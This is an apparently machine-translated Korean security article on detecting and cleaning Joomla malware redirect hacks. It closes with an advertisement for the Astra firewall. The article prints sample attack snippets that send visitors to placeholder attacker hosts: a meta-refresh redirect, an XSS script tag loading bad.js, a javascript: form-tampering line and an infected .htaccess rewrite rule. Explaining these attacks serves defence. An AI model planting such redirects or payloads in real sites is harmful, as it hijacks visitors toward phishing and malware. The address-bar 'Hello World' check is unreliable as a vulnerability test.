Computer >> 컴퓨터 >  >> 네트워킹 >> 네트워크 보안

Joomla Malware Redirect Hack – 탐지 및 수정 방법

Joomla는 사이트를 관리하는 일상적인 일상 작업에 편리함을 더합니다. 오픈 소스 커뮤니티에 의해 구동되는 이 CMS는 사용자 친화적입니다. Joomla는 또한 다양한 확장 기능을 제공하기 때문에 인기가 있습니다. 올해 Joomla에서 여러 취약점이 발견되었습니다. 이러한 취약점은 Joomla XSS, 파일 침입, Joomla SQL 주입 등의 범위입니다. 이러한 취약점은 이를 악용하여 이득을 취하려는 공격자를 유인합니다. 개발자는 패치를 일찍 출시하지만 사용자는 업데이트하는 데 시간이 걸립니다. 이로 인해 많은 Joomla가 악용에 취약합니다. 일단 손상되면 Joomla 사이트는 공격자의 주도권에 있습니다. 공격자는 이를 훼손하거나 파괴하거나 Joomla 리디렉션 해킹을 수행할 수 있습니다. Joomla 리디렉션 해킹은 공격자가 클릭을 수집하는 데 도움이 되므로 상당히 일반적입니다. Joomla 리디렉션 해킹은 공격자가 스팸을 제공하는 데도 도움이 됩니다. 책 Joomla Web Security에 따르면

Joomla 리디렉션 해킹:증상

Joomla 리디렉션 해킹은 종종 감지하기 어려울 수 있습니다. 웹 관리자는 오랫동안 알지 못할 수 있습니다. 일부 사용자가 웹 사이트의 다른 곳에서 끝나는 것에 대해 불평하는 경우에만 그/그녀가 알림을 받을 수 있습니다. Joomla 맬웨어 리디렉션에 의해 손상된 사이트의 일반적인 증상은 다음과 같습니다.

  • 사용자가 알 수 없는 도메인으로 리디렉션됩니다.
  • 방문자에게 제공되는 가짜 광고 사이트.
  • 사이트가 사용자의 기기에 멀웨어를 설치하려고 시도할 수 있습니다.
  • 사이트는 스팸을 제공하여 블랙리스트에 올릴 수 있습니다.
  • 가짜 피싱 페이지가 사이트에 나타납니다. 특히 결제 페이지에서.
  • 여러 팝업이 차례로 나타날 수 있습니다.

Joomla 해킹 리디렉션:예

Joomla 맬웨어 리디렉션은 인터넷 전체에서 웹 관리자를 당황하게 만듭니다. 종종 첫 번째 반응은 Joomla 커뮤니티 포럼의 도움을 받는 것입니다. 때때로 Joomla 리디렉션 해킹은 정리 후에도 반환됩니다. 그러한 경우의 몇 가지 예가 아래에 나와 있습니다.

Joomla Malware Redirect Hack – 탐지 및 수정 방법 Joomla Malware Redirect Hack – 탐지 및 수정 방법 Joomla Malware Redirect Hack – 탐지 및 수정 방법

Joomla 리디렉션 해킹:원인

DNS 하이재킹

DNS 하이재킹에는 몇 가지 심각한 의미가 있습니다. Wikileaks와 같은 대기업은 DNS 하이재킹 공격의 피해자였습니다. 이 기술을 사용하여 공격자는 Joomla 사이트의 전체 트래픽을 다시 라우팅할 수 있습니다. 특히 대기업은 DNS 서버를 안전하게 유지해야 합니다. DNS 하이재킹은 다음 두 채널을 통해 수행할 수 있습니다.

  • 호스트 파일 변조: 각 컴퓨터에는 고유한 Hosts.txt 파일이 있습니다. 이 파일은 호스트 이름을 해당 IP로 변환하는 데 도움이 됩니다. 대규모 맬웨어 공격은 컴퓨터의 호스트 파일을 변조할 수 있습니다. 그런 다음 이러한 컴퓨터는 Joomla 사이트 대신 공격자가 제어하는 ​​도메인으로 리디렉션됩니다. 따라서 Joomla 맬웨어 리디렉션을 수행합니다.
  • DNS 서버 공격: DNS는 꽤 오래된 프로토콜이므로 전체 시스템이 신뢰에 의존합니다. DNS 서버는 슬레이브 및 마스터 서버를 통해 통신합니다. 마스터는 요청에 따라 영역을 슬레이브 서버로 전송합니다. DNS 영역은 기본적으로 로컬 데이터베이스의 복사본입니다. 여기에는 검색 엔진을 통해 공개적으로 표시되지 않을 수 있는 시스템에 대한 민감한 정보가 포함됩니다. 따라서 공격자는 불량 슬레이브 서버를 설정하고 영역의 복사본을 얻습니다. 공격자는 이 정보를 사용하여 취약한 시스템을 공격하려고 시도하고 네트워크를 손상시킵니다. 또한 공격자는 로컬 DNS 서버를 변조할 수 있습니다. 따라서 모든 쿼리는 공격자가 제어하는 ​​시스템으로 리디렉션됩니다. 따라서 Joomla 리디렉션 해킹을 성공적으로 수행했습니다!

또한 이러한 공격은 공용 Wi-Fi의 LAN 네트워크에서도 수행될 수 있습니다. 공격자는 가짜 DNS 프록시를 설정할 수 있습니다. 이렇게 하면 Joomla 사이트의 IP가 공격자가 제어하는 ​​시스템으로 확인됩니다. 따라서 모든 로컬 사용자를 속여 가짜 Joomla 사이트로 리디렉션합니다. 따라서 Joomla 리디렉션 해킹을 수행합니다!

SQL 주입

올해도 Joomla는 여러 SQLi에 취약한 것으로 나타났습니다. 그 중 하나에서 취약한 구성 요소는 사용자 메모 목록 보기 였습니다. &CVE-2018-8045로 명명되었습니다. 이 결함으로 인해 공격자는 서버에서 SQL 문을 실행할 수 있습니다. 데이터베이스의 민감한 테이블이 노출됩니다. 여기에서 얻은 로그인 정보는 대시보드를 손상시킬 수 있습니다. 대시보드는 공격자가 리디렉션을 생성하는 Javascript 코드로 각 파일을 감염시킬 수 있는 기능을 제공합니다. 종종 공격자는 이 프로세스를 자동화하려고 시도하므로 이 작업을 수행하는 스크립트를 업로드합니다. 공격자는 기존 파일 내에 주입하거나 새 파일을 생성하여 Joomla 해킹 리디렉션을 삽입할 수 있습니다. Joomla 해킹 리디렉션을 생성하는 일반적으로 생성되는 감염 파일은 다음과 같습니다.

  • /uuc/news_id.php
  • /zkd/news_fx.php
  • /dgmq/w_news.php
  • /cisc/br-news.php

그러한 파일을 발견한 경우 계속해서 제거하십시오. 이러한 각 파일에는 악성 리디렉션 코드가 포함됩니다. 다음과 같이 보일 것입니다:

<meta http-equiv="refresh" content="2; url=https://attackerDOMAIN.com/ "> . 이 파일은 메타 태그를 사용하여 사용자를 리디렉션합니다. . 방문자는 attackerDOMAIN.com로 리디렉션됩니다. . 때때로 Joomla 사이트가 Stacked Based SQLi에 취약할 수 있다는 점은 주목할 만합니다. . 이것은 공격자가 시스템 명령을 실행할 수 있는 능력을 제공합니다. 따라서 공격자는 SQL 문만 사용하여 악성 리디렉션 코드로 파일을 감염시킬 수 있습니다!

교차 사이트 스크립팅

XSS는 일반적으로 발견되는 취약점과 관련하여 SQLi의 가까운 친구입니다. 올해 Joomla에서 많은 XSS 취약점이 발견되었습니다. 여기에는 CVE-2018-15880, CVE-2018-12711, CVE-2018-11328, CVE-2018-11326이 포함됩니다. 목록 중 가장 심각한 것은 CVE-2018-12711이었습니다. . 이는 '언어 전환기 모듈 결함으로 인해 발생했습니다. '. 이로 인해 일부 언어의 URL이 JS에 감염될 수 있었습니다. XSS를 사용하여 공격자는 Joomla 맬웨어 리디렉션을 만드는 것 외에도 쿠키를 훔치는 것과 같은 다른 공격을 수행할 수 있습니다.

<script%20src="https://maliciousSite.com/bad.js"></script>

이 코드는 취약한 매개변수 뒤에 삽입될 때 사용자를 리디렉션할 수 있습니다. 사용자는 maliciousSite.com로 리디렉션됩니다. 및 악성 스크립트bad.js 로드됩니다. 스크립트bad.js 공격자의 동기에 따라 모든 종류의 Javascript 작업을 수행할 수 있습니다. XSS를 악용하여 공격자는 Joomla 리디렉션 해킹 외에도 피싱 페이지로 피해자를 유인할 수 있습니다.

자바스크립트 삽입

Javascript는 매우 강력하며 종종 동적 작업을 수행하는 데 사용됩니다. 그러나 안전한 코딩 관행의 부재와 일부 확장 개발자가 뒤따르는 일부 확장 개발자는 Joomla를 Javascript 주입에 취약하게 만듭니다. XSS와 마찬가지로 Javascript 주입을 사용하여 Joomla 해킹 리디렉션을 수행할 수 있습니다. 자바스크립트 주입에 대한 휴리스틱 테스트를 수행할 수 있습니다. 방문 중인 사이트의 주소 표시줄에 다음을 입력합니다.

javascript:alert(‘Hello World!’);

사이트에 'Hello World!'라는 메시지 상자가 표시되는 경우 사이트가 취약합니다. 이제부터 공격자는 여러 방법으로 사이트를 조작할 수 있습니다. 예를 들어 공격자는 양식의 특정 필드에 가짜 URL을 추가할 수 있습니다.

javascript:void(document.forms[0].redirect01.value="fakeDOMAIN.com") 여기에서 이 코드는 fakeDOMAIN.com 값을 추가합니다. redirect01이라는 입력에 . 따라서 필드에는 이제 가짜 사이트에 대한 링크가 포함됩니다. 그러나 여기에서 Reflected XSS와 마찬가지로 이 공격이 로컬 시스템에서 온라인으로 수행된다는 점에 주목해야 합니다. 따라서 원격 사용자를 속이기 위해 공격자는 다른 사회 공학 기술에 의존해야 합니다.

.htaccess 파일

.htaccess는 여러 작업을 수행할 수 있는 매우 강력한 파일입니다. 몇 가지 유형의 스크립트 주입 공격을 방지하는 것 외에도 리디렉션을 생성하는 데 자주 사용됩니다. Joomla 리디렉션 해킹의 경우 .htaccess 다음과 같은 코드에 감염됩니다:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteRule .* https://MaliciousDomain.tld/redirect.php?t=3 [R,L]

이 코드 조각의 마지막 줄은 사용자를 MaliciousDomain으로 리디렉션합니다. . 이것은 스크립트redirect.php를 사용하여 수행됩니다. . .htacces 외에도 index.php와 같은 파일도 일반적으로 감염됩니다. index.php로 사용자가 처음 방문하는 페이지는 상당한 양의 사용자 트래픽에 기여합니다. 따라서 공격자는 index.php 손상을 시도합니다. 최대 트래픽을 전환합니다. 이렇게 우회된 트래픽은 차례로 공격자가 클릭을 수집하는 데 도움이 됩니다.

Joomla 리디렉션 해킹:수정 사항

DNS 서버 보안

영역 전송을 최소한으로 제한합니다. 불량 슬레이브가 영역 전송을 요청할 수 없도록 모든 슬레이브 DNS 서버를 미리 정의하십시오. 이것은 named.conf.local을 편집하여 수행할 수 있습니다. 파일. 예를 들어 아래 제공된 이미지를 보십시오.

Joomla Malware Redirect Hack – 탐지 및 수정 방법

이 코드는 슬레이브 DNS 서버, 즉 secundario01을 미리 정의합니다. 따라서 신뢰할 수 있는 서버에만 영역 전송을 허용합니다. 때때로 DNS 서버는 데이터 유출 공격에도 사용됩니다. 따라서 실시간으로 DNS 서버를 통과하는 데이터 패킷을 모니터링하십시오. 이것은 Wireshark와 같은 편리한 도구를 통해 수행할 수 있습니다.

데이터베이스 정리

Joomla 리디렉션 해킹을 담당하는 코드가 코어 파일에 숨겨져 있으면 감지하기 어려워집니다. 감염된 모든 파일에는 공통점이 있습니다. 리디렉션을 담당하는 악성 코드입니다. 이러한 모든 파일은 PhpMyAdmin과 같은 데이터베이스 관리 도구를 사용하여 한 번의 클릭으로 검색할 수 있습니다. 예를 들어 아래 주어진 이미지를 보십시오.

Joomla Malware Redirect Hack – 탐지 및 수정 방법

PhpMyAdmin에는 쉽게 감지할 수 있는 검색 기능이 있습니다. 이 도구는 악성 스크립트hxxp://maliciousSITE[.]com/bad.php가 포함된 모든 페이지/게시물을 검색할 수 있습니다. 그들의 코드에서. 이 외에도 도구는 다음 작업에도 사용할 수 있습니다.

  • 새 관리자를 확인하고 제거합니다.
  • 데이터베이스 비밀번호 재설정.
  • 감염된 테이블을 청소합니다.
  • 공격자가 데이터베이스를 손상시킨 경우 변경 사항을 롤백합니다.

제3자 광고

종종 웹 관리자는 사이트의 제3자 광고가 일부 수익을 얻도록 허용합니다. 그러나 일부 광고 네트워크는 책으로 재생되지 않습니다. 광고 콘텐츠를 관대하게 제공하면 악의적인 플레이어가 광고 내에 리디렉션 코드를 삽입할 수 있습니다. 게다가 대부분의 악성 스크립트는 다른 서버에서 호스팅되어 문제를 더욱 복잡하게 만듭니다. 청소 후에도 감염이 반복되면 광고를 차단해 보세요. Joomla 리디렉션 해킹이 중지된 경우 사이트의 악성 광고 때문일 수 있습니다. 따라서 광고 네트워크에 문의하여 문제를 해결하십시오.

기타 주의사항

  • 업데이트에는 변경 로그에서 확인할 수 있는 주요 보안 수정 사항이 포함되어 있습니다. 따라서 Joomla를 안전하게 유지하려면 정기적으로 업데이트하십시오.
  • 유명한 확장 프로그램만 사용하십시오. null 또는 잘못 코딩된 확장을 사용하지 마십시오. 핵심 파일 외에도 확장 프로그램도 업데이트하세요.
  • 보안 자격 증명은 무차별 대입 공격의 가능성을 최소화할 수 있습니다.
  • 서버에 대한 파일 권한을 확보합니다. .htaccess와 같은 파일에 대한 권한이 있는지 확인하십시오. 444 (r–r–r–)으로 설정됨 또는 440 (r–r—–) .
  • 파일 수정이 의심되는 경우 SSH를 통해 로그인하세요. 터미널에서 다음 명령을 실행합니다.find /path-of-www -type f -printf '%TY-%Tm-%Td %TT %pn' | sort -r . 얻은 출력은 각각의 타임스탬프에 따라 수정된 파일 목록입니다. 여기에서 수동으로 파일을 검사합니다. '# 문자를 사용하여 의심스러운 코드 줄을 주석 처리 '. 그 후 파일 평가를 위해 전문가와 상의하세요!

방화벽

Joomla 리디렉션 해킹이 다시 발생하지 않도록 하는 것이 중요합니다. 그러나 해커는 지속적으로 사이트를 목표로 삼을 수 있습니다. 이러한 시나리오에서 가장 효과적인 방어 메커니즘은 방화벽을 사용하는 것입니다. 방화벽 통합은 매우 쉽고 편리합니다. 오늘날 시장에서 사용 가능한 보안 솔루션은 쉽게 확장할 수 있습니다. 소규모 블로그와 대규모 쇼핑 사이트에 적합한 Astra의 것과 같습니다. 또한 Astra는 파일이 수정될 때마다 이메일을 통해 사용자에게 알립니다.

아스트라

Astra는 Joomla 맬웨어 리디렉션 차단과 관련하여 뛰어난 실적을 보유하고 있습니다. 또한 Astra에서 배포한 패킷 필터링은 공격자의 잘못된 요청이 사이트를 손상시키지 않도록 합니다. 또한 Astra는 Joomla 사이트에 대한 보안 감사를 수행하고 취약점이 감지되면 알려줍니다. 따라서 공격자보다 한 발 앞서 나갈 수 있습니다. 인간 지원과 자동화가 완벽하게 결합된 Astra는 Joomla 리디렉션 해킹을 차단하는 것이 좋습니다.

Joomla Malware Redirect Hack – 탐지 및 수정 방법